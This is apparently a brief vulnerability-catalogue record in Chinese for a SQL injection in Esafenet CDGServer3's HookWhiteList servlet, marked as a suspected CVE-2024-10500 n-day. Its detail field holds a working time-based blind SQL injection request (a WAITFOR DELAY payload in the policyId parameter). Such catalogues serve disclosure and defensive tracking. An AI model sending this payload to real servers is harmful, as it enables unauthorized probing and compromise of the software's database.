vendor = "绿盟"
name = "亿赛通 HookWhiteListservice SQL 注入"
type = "SQL注入"
version = "v5"
path = "/com/esafenet/servlet/policy/HookWhiteListService.java /CDGServer3/policy/HookWhiteList"
detail = "疑似CVE-2024-10500 /CDGServer3/policy/HookWhiteList;logindojojs?command=AddHookWhiteList&policyId=1';if(db_name()='CobraDGServer')+WAITFOR+DELAY+'0:0:5'--"
fix = "老洞，自修"
date = "0703"
label = "nday"
verifier = "AdySec"
